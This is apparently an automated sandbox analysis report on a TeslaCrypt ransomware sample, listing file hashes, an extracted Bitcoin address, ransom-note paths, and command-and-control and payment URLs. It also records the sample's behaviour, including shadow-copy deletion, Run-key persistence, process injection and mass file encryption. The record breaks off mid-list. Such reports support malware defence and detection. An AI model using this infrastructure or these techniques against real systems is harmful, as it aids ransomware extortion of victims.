Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
TeslaCrypt-1.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
TeslaCrypt-1.exe
Resource
win10v2004-20241007-en
General
-
Target
TeslaCrypt-1.exe
-
Size
257KB
-
MD5
6e080aa085293bb9fbdcc9015337d309
-
SHA1
51b4ef5dc9d26b7a26e214cee90598631e2eaa67
-
SHA256
9b462800f1bef019d7ec00098682d3ea7fc60e6721555f616399228e4e3ad122
-
SHA512
4e173fb5287c7ea8ff116099ec1a0599b37f743f8b798368319b5960af38e742124223dfd209457665b701e9efc6e76071fa2513322b232ac50ddad21fcebe77
-
SSDEEP
6144:xy+als+0nIycigV5cbEo6dZbBODPIsjQ/UFsYW:xy+aCFnIycigVSbObBODTMUd
Malware Config
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txt
19aqfVmho8vBNf6mL2Eh7zE5ZEbEYfXAHw
http://3kxwjihmkgibht2s.wh47f2as19.com
http://34r6hq26q2h4jkzj.7hwr34n18.com
https://3kxwjihmkgibht2s.s5.tor-gateways.de/
http://34r6hq26q2h4jkzj.onion/
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (366) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 484 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
sqyxipn.exesqyxipn.exepid process 684 sqyxipn.exe 2868 sqyxipn.exe -
Loads dropped DLL 3 IoCs
Processes:
TeslaCrypt-1.exesqyxipn.exesqyxipn.exepid process 1616 TeslaCrypt-1.exe 684 sqyxipn.exe 2868 sqyxipn.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
sqyxipn.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msconfig = "C:\\Users\\Admin\\AppData\\Roaming\\sqyxipn.exe" sqyxipn.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ipinfo.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
sqyxipn.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_RESTORE_FILES.bmp" sqyxipn.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
TeslaCrypt-1.exesqyxipn.exedescription pid process target process PID 1304 set thread context of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 684 set thread context of 2868 684 sqyxipn.exe sqyxipn.exe -
Drops file in Program Files directory 64 IoCs
Processes:
sqyxipn.exedescription ioc process File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json sqyxipn.exe File created C:\Program Files\Windows Defender\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\library.js sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\reflect.png sqyxipn.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\js\calendar.js sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png sqyxipn.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png sqyxipn.exe File opened for modification C:\Program Files\MergeNew.xlsb sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\js\settings.js sqyxipn.exe File created C:\Program Files\Common Files\System\Ole DB\en-US\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png sqyxipn.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png sqyxipn.exe File created C:\Program Files\Mozilla Firefox\uninstall\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\service.js sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\settings.js sqyxipn.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask_PAL.wmv sqyxipn.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sv.pak sqyxipn.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\css\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png sqyxipn.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js sqyxipn.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt sqyxipn.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\lo\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png sqyxipn.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\Windows Photo Viewer\de-DE\HELP_RESTORE_FILES.txt sqyxipn.exe File created C:\Program Files\VideoLAN\VLC\locale\sm\LC_MESSAGES\HELP_RESTORE_FILES.txt sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png sqyxipn.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png sqyxipn.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\HELP_RESTORE_FILES.txt sqyxipn.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXETeslaCrypt-1.exeTeslaCrypt-1.exesqyxipn.exesqyxipn.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TeslaCrypt-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TeslaCrypt-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqyxipn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sqyxipn.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2992 vssadmin.exe -
Modifies Control Panel 2 IoCs
Processes:
sqyxipn.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\WallpaperStyle = "0" sqyxipn.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\TileWallpaper = "0" sqyxipn.exe -
Processes:
iexplore.exeiexplore.exeiexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{993ADA71-A775-11EF-B3B7-668826FBEB66} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e78a69453f00554b9c7935775bae7b96000000000200000000001066000000010000200000004300cf92d53c3cb1a6a7842223653adfcccafba9fe9b952c072cdcd76e7aa9a4000000000e8000000002000020000000fda5298fcde29aee4de93ac9aa51f90713ca4a9d3078c3b56c9c3049bd12ede620000000f2d6526f7ed6b9296ff3b30dded0e0e74895795aae8ebc0e86499d53aa6371a240000000e8b3052cb47def98ca1a0f7089298ebd47306139761e63cfabf4baf5bf84064f627adb55f4e4e7ae0398e2200cd6ccd3a065272f8d40317cf604bffd7ef71d25 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{993D3BD1-A775-11EF-B3B7-668826FBEB66} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e78a69453f00554b9c7935775bae7b96000000000200000000001066000000010000200000000dffa66df738242c2b79bd8e84eeca858f3931d2ba38efc86970bc9c868c4f97000000000e80000000020000200000000e7a49a87eb4bedc41160c68e19383f07b45af44c7d7fe00aa7863ea68c45f3c900000000760abf1d2ba693abd24831118907444b1e395a1e7573b843c0efc132fac3ffac46ea9fabfe53f07ceab08166383bf532b8a67e1b24db39e821cf7acd4e2f6b4f5aee2917469efd141016b82a26108250de715f9b1a6359a53e5ac2b8c0d959cc80177f2e76f95a91797e2457a34fea308437600a76348439d1267d65bcae45981bed974e53ac2bbf40ba8fe5000abfa40000000a37c765038416a6f10f2069b1762710c18b69fabe7bdcff0e9a6ad6d05e736895b7f4008f19dc66dfb42f77b22c16d6ad24b7c6659009e938052ad7757891782 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A5EE70B1-A775-11EF-B3B7-668826FBEB66} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
sqyxipn.exepid process 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe 2868 sqyxipn.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
TeslaCrypt-1.exesqyxipn.exevssvc.exedescription pid process Token: SeDebugPrivilege 1616 TeslaCrypt-1.exe Token: SeDebugPrivilege 2868 sqyxipn.exe Token: SeBackupPrivilege 2796 vssvc.exe Token: SeRestorePrivilege 2796 vssvc.exe Token: SeAuditPrivilege 2796 vssvc.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
sqyxipn.exeiexplore.exeiexplore.exeiexplore.exepid process 2868 sqyxipn.exe 2760 iexplore.exe 884 iexplore.exe 2868 sqyxipn.exe 2764 iexplore.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
iexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXEiexplore.exeIEXPLORE.EXEpid process 2760 iexplore.exe 2760 iexplore.exe 884 iexplore.exe 884 iexplore.exe 2812 IEXPLORE.EXE 2812 IEXPLORE.EXE 3044 IEXPLORE.EXE 3044 IEXPLORE.EXE 2812 IEXPLORE.EXE 2812 IEXPLORE.EXE 2764 iexplore.exe 2764 iexplore.exe 2156 IEXPLORE.EXE 2156 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
TeslaCrypt-1.exeTeslaCrypt-1.exesqyxipn.exesqyxipn.exeiexplore.exeiexplore.exeiexplore.exedescription pid process target process PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1304 wrote to memory of 1616 1304 TeslaCrypt-1.exe TeslaCrypt-1.exe PID 1616 wrote to memory of 684 1616 TeslaCrypt-1.exe sqyxipn.exe PID 1616 wrote to memory of 684 1616 TeslaCrypt-1.exe sqyxipn.exe PID 1616 wrote to memory of 684 1616 TeslaCrypt-1.exe sqyxipn.exe PID 1616 wrote to memory of 684 1616 TeslaCrypt-1.exe sqyxipn.exe PID 1616 wrote to memory of 484 1616 TeslaCrypt-1.exe cmd.exe PID 1616 wrote to memory of 484 1616 TeslaCrypt-1.exe cmd.exe PID 1616 wrote to memory of 484 1616 TeslaCrypt-1.exe cmd.exe PID 1616 wrote to memory of 484 1616 TeslaCrypt-1.exe cmd.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 684 wrote to memory of 2868 684 sqyxipn.exe sqyxipn.exe PID 2868 wrote to memory of 2992 2868 sqyxipn.exe vssadmin.exe PID 2868 wrote to memory of 2992 2868 sqyxipn.exe vssadmin.exe PID 2868 wrote to memory of 2992 2868 sqyxipn.exe vssadmin.exe PID 2868 wrote to memory of 2992 2868 sqyxipn.exe vssadmin.exe PID 2868 wrote to memory of 884 2868 sqyxipn.exe iexplore.exe PID 2868 wrote to memory of 884 2868 sqyxipn.exe iexplore.exe PID 2868 wrote to memory of 884 2868 sqyxipn.exe iexplore.exe PID 2868 wrote to memory of 884 2868 sqyxipn.exe iexplore.exe PID 2868 wrote to memory of 2760 2868 sqyxipn.exe iexplore.exe PID 2868 wrote to memory of 2760 2868 sqyxipn.exe iexplore.exe PID 2868 wrote to memory of 2760 2868 